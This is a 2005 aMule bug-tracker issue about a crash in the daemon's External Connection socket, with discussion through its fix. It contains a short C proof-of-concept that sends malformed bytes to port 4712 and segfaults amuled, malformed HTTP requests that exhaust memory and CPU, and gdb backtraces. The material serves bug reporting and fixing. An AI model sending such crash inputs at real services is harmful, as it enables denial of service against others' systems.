aMule Bug Tracker - aMule
View Issue Details
0000669aMuleExternal Connpublic2005-11-27 17:582008-02-24 01:46
ced 
GonoszTopi 
urgentmajoralways
resolvedfixed 
Slackware 10.2Linux2.4.31
SVN 
 
0000669: ECSocket bug
Bug when connect to external port connection with special requests. Here the code to reproduce the bug:
/*
    Bug in ECSocket code

    - aMule-2.0.3:
    amuled segfault

    - aMule-CVS-20051127:
    enter infinite loop error after the socket 10sec timeout
    (ECSocket error: Invalid socket (uninitialized)).
    webserver and amulecmd segfault with when you connect
    to external port connection.
    Amuled don't crash but seriously disturbed
    Probably buggy on previous cvs version but not tested.
 */

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char **argv)
{
    struct sockaddr_in to;
    char buf[8];

    int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock < 0) {
        perror("socket");
        return -1;
    }

    to.sin_addr.s_addr = inet_addr("192.168.0.1");
    to.sin_port = htons(4712);
    to.sin_family = AF_INET;

    if (connect(sock, (const struct sockaddr *)&to, sizeof(to)) < 0) {
        perror("connect");
        return -1;
    }

    memset(buf, 0, 8);
    memcpy(buf, "\x01", 1);
    strcat(buf, "ed2k");

    send(sock, "\x20", 1, 0);
    send(sock, buf, strlen(buf), 0);

    close(sock);

    return 0;
}
I confirm this happen always on my system when I remote connect with the sample code. If anyone can confirm this bug.
No tags attached.
Issue History
2005-11-27 17:58cedNew Issue
2005-11-27 18:00cedNote Added: 0001517
2005-11-27 19:18cedNote Added: 0001518
2005-11-27 21:08GonoszTopiAssigned To => GonoszTopi
2005-11-27 21:08GonoszTopiPrioritynormal => urgent
2005-11-27 21:08GonoszTopiStatusnew => acknowledged
2005-11-27 21:08GonoszTopiProjectionnone => minor fix
2005-11-27 21:08GonoszTopiETAnone => < 1 day
2005-11-27 22:57GonoszTopiStatusacknowledged => resolved
2005-11-27 22:57GonoszTopiResolutionopen => fixed
2005-12-03 02:17cedStatusresolved => feedback
2005-12-03 02:17cedResolutionfixed => reopened
2005-12-03 02:17cedNote Added: 0001538
2005-12-04 19:32GonoszTopiStatusfeedback => acknowledged
2005-12-04 19:32GonoszTopiProjectionminor fix => none
2005-12-04 19:32GonoszTopiETA< 1 day => none
2006-03-24 13:49XaignarNote Added: 0001927
2008-02-24 01:46XaignarStatusacknowledged => resolved
2008-02-24 01:46XaignarResolutionreopened => fixed

Notes
(0001517)
ced   
2005-11-27 18:00   
/*
    Bug in ECSocket code

    - aMule-2.0.3:
    amuled segfault

    - aMule-CVS-20051127:
    enter infinite loop error after the socket 10sec timeout
    (ECSocket error: Invalid socket (uninitialized)).
    webserver and amulecmd segfault with when you connect
    to external port connection.
    Amuled don't crash but seriously disturbed
    Probably buggy on previous cvs version but not tested.
 */

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char **argv)
{
    struct sockaddr_in to;
    char buf[8];

    int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock < 0) {
        perror("socket");
        return -1;
    }

    to.sin_addr.s_addr = inet_addr("192.168.0.1");
    to.sin_port = htons(4712);
    to.sin_family = AF_INET;

    if (connect(sock, (const struct sockaddr *)&to, sizeof(to)) < 0) {
        perror("connect");
        return -1;
    }

    memset(buf, 0, 8);
    memcpy(buf, "\x01", 1);
    strcat(buf, "ed2k");

    send(sock, "\x20", 1, 0);
    send(sock, buf, strlen(buf), 0);

    close(sock);

    return 0;
}
(0001518)
ced   
2005-11-27 19:18   
Backtrace for amule-2.0.3

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 7247)]
0x403e165f in memcpy () from /lib/libc.so.6
(gdb) bt
#0 0x403e165f in memcpy () from /lib/libc.so.6
0000001 0x080ab094 in ECSocket::ReadBuffer (this=0x9584d60, buffer=0x4096b008, len=1278269979) at ECSocket.cpp:459
0000002 0x080ad55c in CECTag (this=0xbffff3a0, socket=@0x9584d60) at ECPacket.cpp:436
0000003 0x080ad75e in CECTag::ReadChildren (this=0xbffff440, socket=@0x9584d60) at ECPacket.cpp:483
0000004 0x080ad4f0 in CECTag (this=0xbffff440, socket=@0x9584d60) at ECPacket.cpp:428
0000005 0x080ad75e in CECTag::ReadChildren (this=0xbffff4e0, socket=@0x9584d60) at ECPacket.cpp:483
0000006 0x080ad4f0 in CECTag (this=0xbffff4e0, socket=@0x9584d60) at ECPacket.cpp:428
0000007 0x080ad75e in CECTag::ReadChildren (this=0x95a6b30, socket=@0x9584d60) at ECPacket.cpp:483
0000008 0x080adbb3 in CECPacket (this=0x95a6b30, socket=@0x9584d60) at ECPacket.cpp:728
0000009 0x080ab8f5 in ECSocket::ReadPacket (this=0x9584d60) at ECSocket.cpp:691
0000010 0x080c7f1b in ExternalConn::OnSocketEvent (this=0x9457a18, event=@0x9668a98) at ExternalConn.cpp:149
#11 0x400db5f7 in wxAppConsole::HandleEvent () from /usr/lib/libwx_base-2.6.so.0
0000012 0x40186e70 in wxEvtHandler::ProcessEventIfMatches () from /usr/lib/libwx_base-2.6.so.0
0000013 0x401862df in wxEventHashTable::HandleEvent () from /usr/lib/libwx_base-2.6.so.0
0000014 0x40187010 in wxEvtHandler::ProcessEvent () from /usr/lib/libwx_base-2.6.so.0
0000015 0x40186db6 in wxEvtHandler::ProcessPendingEvents () from /usr/lib/libwx_base-2.6.so.0
0000016 0x400db579 in wxAppConsole::ProcessPendingEvents () from /usr/lib/libwx_base-2.6.so.0
0000017 0x080645d6 in CamuleDaemonApp::OnRun (this=0x84145d8) at amuled.cpp:397
0000018 0x40120fa8 in wxEntry () from /usr/lib/libwx_base-2.6.so.0
0000019 0x08063678 in main (argc=1, argv=0xbffff7f4) at amuled.cpp:124
(gdb) bt full
#0 0x403e165f in memcpy () from /lib/libc.so.6
No symbol table info available.
0000001 0x080ab094 in ECSocket::ReadBuffer (this=0x9584d60, buffer=0x4096b008, len=1278269979) at ECSocket.cpp:459
No locals.
0000002 0x080ad55c in CECTag (this=0xbffff3a0, socket=@0x9584d60) at ECPacket.cpp:436
No locals.
0000003 0x080ad75e in CECTag::ReadChildren (this=0xbffff440, socket=@0x9584d60) at ECPacket.cpp:483
        i = 0
        tmp_tagCount = 13584
0000004 0x080ad4f0 in CECTag (this=0xbffff440, socket=@0x9584d60) at ECPacket.cpp:428
No locals.
0000005 0x080ad75e in CECTag::ReadChildren (this=0xbffff4e0, socket=@0x9584d60) at ECPacket.cpp:483
        i = 0
        tmp_tagCount = 47990
0000006 0x080ad4f0 in CECTag (this=0xbffff4e0, socket=@0x9584d60) at ECPacket.cpp:428
No locals.
0000007 0x080ad75e in CECTag::ReadChildren (this=0x95a6b30, socket=@0x9584d60) at ECPacket.cpp:483
        i = 1
        tmp_tagCount = 25956
0000008 0x080adbb3 in CECPacket (this=0x95a6b30, socket=@0x9584d60) at ECPacket.cpp:728
No locals.
0000009 0x080ab8f5 in ECSocket::ReadPacket (this=0x9584d60) at ECSocket.cpp:691
        flags = 32
        p = (class CECPacket *) 0x0
0000010 0x080c7f1b in ExternalConn::OnSocketEvent (this=0x9457a18, event=@0x9668a98) at ExternalConn.cpp:149
        sock = (class ECSocket *) 0x9584d60
        request = (class CECPacket *) 0x0
        response = (class CECPacket *) 0x0
#11 0x400db5f7 in wxAppConsole::HandleEvent () from /usr/lib/libwx_base-2.6.so.0
No symbol table info available.
0000012 0x40186e70 in wxEvtHandler::ProcessEventIfMatches () from /usr/lib/libwx_base-2.6.so.0
No symbol table info available.
0000013 0x401862df in wxEventHashTable::HandleEvent () from /usr/lib/libwx_base-2.6.so.0
No symbol table info available.
0000014 0x40187010 in wxEvtHandler::ProcessEvent () from /usr/lib/libwx_base-2.6.so.0
No symbol table info available.
0000015 0x40186db6 in wxEvtHandler::ProcessPendingEvents () from /usr/lib/libwx_base-2.6.so.0
No symbol table info available.
0000016 0x400db579 in wxAppConsole::ProcessPendingEvents () from /usr/lib/libwx_base-2.6.so.0
No symbol table info available.
0000017 0x080645d6 in CamuleDaemonApp::OnRun (this=0x84145d8) at amuled.cpp:397
No locals.
0000018 0x40120fa8 in wxEntry () from /usr/lib/libwx_base-2.6.so.0
No symbol table info available.
0000019 0x08063678 in main (argc=1, argv=0xbffff7f4) at amuled.cpp:124
No locals.
(gdb) thread apply all bt

Thread 4 (Thread 32771 (LWP 7253)):
#0 0x4002f186 in nanosleep () from /lib/libpthread.so.0
0000001 0x00000000 in ?? ()
0000002 0x4018b42a in wxMicroSleep () from /usr/lib/libwx_base-2.6.so.0
0000003 0x4018b465 in wxMilliSleep () from /usr/lib/libwx_base-2.6.so.0
0000004 0x4018376f in wxThread::Sleep () from /usr/lib/libwx_base-2.6.so.0
0000005 0x08171606 in CTimer::CTimerThread::Entry (this=0x841b0e0) at Timer.cpp:100
0000006 0x4018314b in wxThreadInternal::PthreadStart () from /usr/lib/libwx_base-2.6.so.0
0000007 0x4018301f in wxPthreadStart () from /usr/lib/libwx_base-2.6.so.0
0000008 0x400294eb in pthread_start_thread () from /lib/libpthread.so.0
0000009 0x4002957f in pthread_start_thread_event () from /lib/libpthread.so.0
0000010 0x4042fb0a in clone () from /lib/libc.so.6

Thread 2 (Thread 32769 (LWP 7250)):
#0 0x404272da in poll () from /lib/libc.so.6
0000001 0x40028990 in __pthread_manager () from /lib/libpthread.so.0
0000002 0x40028bb7 in __pthread_manager_event () from /lib/libpthread.so.0
0000003 0x4042fb0a in clone () from /lib/libc.so.6

Thread 1 (Thread 16384 (LWP 7247)):
#0 0x403e165f in memcpy () from /lib/libc.so.6
0000001 0x080ab094 in ECSocket::ReadBuffer (this=0x9584d60, buffer=0x4096b008, len=1278269979) at ECSocket.cpp:459
0000002 0x080ad55c in CECTag (this=0xbffff3a0, socket=@0x9584d60) at ECPacket.cpp:436
0000003 0x080ad75e in CECTag::ReadChildren (this=0xbffff440, socket=@0x9584d60) at ECPacket.cpp:483
0000004 0x080ad4f0 in CECTag (this=0xbffff440, socket=@0x9584d60) at ECPacket.cpp:428
0000005 0x080ad75e in CECTag::ReadChildren (this=0xbffff4e0, socket=@0x9584d60) at ECPacket.cpp:483
0000006 0x080ad4f0 in CECTag (this=0xbffff4e0, socket=@0x9584d60) at ECPacket.cpp:428
0000007 0x080ad75e in CECTag::ReadChildren (this=0x95a6b30, socket=@0x9584d60) at ECPacket.cpp:483
0000008 0x080adbb3 in CECPacket (this=0x95a6b30, socket=@0x9584d60) at ECPacket.cpp:728
0000009 0x080ab8f5 in ECSocket::ReadPacket (this=0x9584d60) at ECSocket.cpp:691
0000010 0x080c7f1b in ExternalConn::OnSocketEvent (this=0x9457a18, event=@0x9668a98) at ExternalConn.cpp:149
#11 0x400db5f7 in wxAppConsole::HandleEvent () from /usr/lib/libwx_base-2.6.so.0
0000012 0x40186e70 in wxEvtHandler::ProcessEventIfMatches () from /usr/lib/libwx_base-2.6.so.0
0000013 0x401862df in wxEventHashTable::HandleEvent () from /usr/lib/libwx_base-2.6.so.0
0000014 0x40187010 in wxEvtHandler::ProcessEvent () from /usr/lib/libwx_base-2.6.so.0
0000015 0x40186db6 in wxEvtHandler::ProcessPendingEvents () from /usr/lib/libwx_base-2.6.so.0
0000016 0x400db579 in wxAppConsole::ProcessPendingEvents () from /usr/lib/libwx_base-2.6.so.0
0000017 0x080645d6 in CamuleDaemonApp::OnRun (this=0x84145d8) at amuled.cpp:397
0000018 0x40120fa8 in wxEntry () from /usr/lib/libwx_base-2.6.so.0
0000019 0x08063678 in main (argc=1, argv=0xbffff7f4) at amuled.cpp:124
(0001538)
ced   
2005-12-03 02:17   
Bugs reproduce on amule-cvs(20051202):

The requests are funny, other random data could lead to same results or crash amuled


This request make unavailable communication with port 4712 (amulecmd and amuleweb segfault)
http://192.168.0.1:4712/if(this->request){packet_data=schmilblick;}else{packet_data=NULL;}return; [^]
Amuled debug messages:
ZLib operation returned Z_DATA_ERROR
ZLib error message: incorrect header check
zstream state:
        next_in=0x993662a
        avail_in=506
        total_in=2
        next_out=0x993e630
        avail_out=32768
        total_out=0
CECSocket error: Invalid socket (uninitialized)
CECSocket error: Invalid socket (uninitialized)
CECSocket error: Invalid socket (uninitialized)


This request cause amuled to consume a lot of memory and cpu time
http://192.168.0.1:4712/if [^](this->
After 2 minutes depend memory capacity on the system, launch the request one more time
and port 4712 is unavailable, cpu time usage increase.
----------------------------------------------
Amuled debug messages after the first request:
ZLib operation returned Z_DATA_ERROR
ZLib error message: incorrect header check
zstream state:
        next_in=0x9764e32
        avail_in=440
        total_in=2
        next_out=0x976d008
        avail_out=32768
        total_out=0
CECSocket error: Invalid socket (uninitialized)
-----------------------------------------------
Amuled debug messages after the second request:
ZLib operation returned Z_DATA_ERROR
ZLib error message: incorrect header check
zstream state:
        next_in=0x40b89de2
        avail_in=440
        total_in=2
        next_out=0x40b91de8
        avail_out=32768
        total_out=0
CECSocket error: Invalid socket (uninitialized)
CECSocket error: Invalid socket (uninitialized)
CECSocket error: Invalid socket (uninitialized)
(0001927)
Xaignar   
2006-03-24 13:49   
This no longer seems to happen in 2.1.x and CVS.